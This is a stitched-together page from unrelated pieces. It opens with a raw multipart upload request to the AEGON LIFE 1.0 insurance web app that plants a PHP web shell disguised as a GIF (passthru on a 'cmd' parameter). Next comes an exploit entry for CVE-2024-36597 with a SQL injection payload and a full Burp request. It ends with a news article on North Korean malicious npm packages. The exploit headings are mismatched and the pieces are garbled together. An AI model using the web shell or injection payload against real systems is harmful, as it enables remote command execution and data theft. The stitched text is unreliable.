------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_birth_date"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_relationship"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="priority"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_phone"

1  
------WebKitFormBoundary5plGALZGPOOdBlF0

AEGON LIFE 1.0 Remote Code Execution

AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

The recently identified threat actor uses public registries for distribution and has expanded capabilities to disrupt the software supply chain.

Source: Igor Stevanovic via Alamy Stock Photo

A newly identified North Korean threat actor has widened its distribution of malicious node package manager (npm) code to public registries. And it's differentiating itself from other state-sponsored groups as it ramps up activity to threaten the software supply chain by poisoning open source code repositories.

Moonstone Sleet first appeared on the scene late last month, when Microsoft revealed that the threat group concurrently was engaged in espionage and financial cyberattacks using a grab bag of attack techniques against aerospace, education, and software organizations and developers.

Among those techniques was to try to get hired for remote tech jobs with real companies and, in the process, spread malicious npm packages on LinkedIn and freelancer websites. Now researchers from CheckMarx have discovered that the scope of Moonstone Sleet's malicious npm package activity is wider than first reported, according to a blog post published on June 13.

The actor is "placing those malicious packages in public open source package repositories that are accessible to developers," an activity that allows the actor to expand its attack surface, Tzachi Zornstein, head of software supply chain at Checkmarx, tells Dark Reading.

"With the revelation of this new North Korean group, coupled with the recent attacks by Russian and North Korean threat actors … it has become increasingly apparent that the open-source ecosystem has become a prime target for powerful and sophisticated adversaries," Zornstein and fellow CheckMarx researcher Yehuda Gelb wrote in the post.

The researchers cite the multiyear supply chain attack that started with a backdoor implanted in the XZ Utils data compression utility to demonstrate how spreading malicious open source code can have a massive ripple effect across the security of enterprise software.

**Differentiation From Lazarus Activity**

CheckMarx also discovered how Moonstone Sleet is setting itself apart through the structure and the style of its malicious code packages from another well-known and prolific North Korean actor — Jade Sleet, better known as Lazarus — that engages in similar activity.

The newest packages published late last year and in the first quarter of 2024 show Moonstone Sleet using "a single-package approach" that executes its payload immediately upon installation, the researchers wrote.

Further, while earlier malicious payloads "included OS-specific code, executing only if it detected that it was running on a Windows machine," packages released earlier this year show the actor adding obfuscation and creating code to target Linux systems if that OS is detected by the package, the researchers revealed.

In contrast, Lazarus designed its packages, discovered in the summer of 2023, to work in pairs, with each pair being published by a separate npm user account to distribute their malicious functionality. "This approach was used in an attempt to make it more challenging to detect and trace the malicious activity back to a single source," Zornstein and Gelb wrote.

The first package from Lazarus would create a directory on the victim's machine, fetch updates from a remote server, and save them in a file within the newly created directory, while the second package would execute the malicious payload.

**Evolving Threat to Open Source Ecosystem**

The tactic of publishing malicious npm packages by North Korean threat actors in general "underscores the persistent nature of their campaign" and poses a growing risk for the open source community that depends on public registries for software development.

"By uploading those malicious packages to a public registry, the attackers abuse the trust that developers have for the open source registries," Zornstein says.

However, while the open source community plays a key role in maintaining the security and integrity of the ecosystem, the primary responsibility for ensuring the safety of the software supply chain lies with the organizations that consume these packages. That's why it's imperative for organizations to "scan the code in the packages for malicious behaviors … prior to making the code available to developers," he says.

Developers and organizations also should continue to collaborate and share information among themselves and with the security community to identify and thwart these attacks, the researchers said. "Through collective effort and proactive measures," they wrote, "we can work towards a safer and more secure open-source ecosystem for all."

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Tag

#linux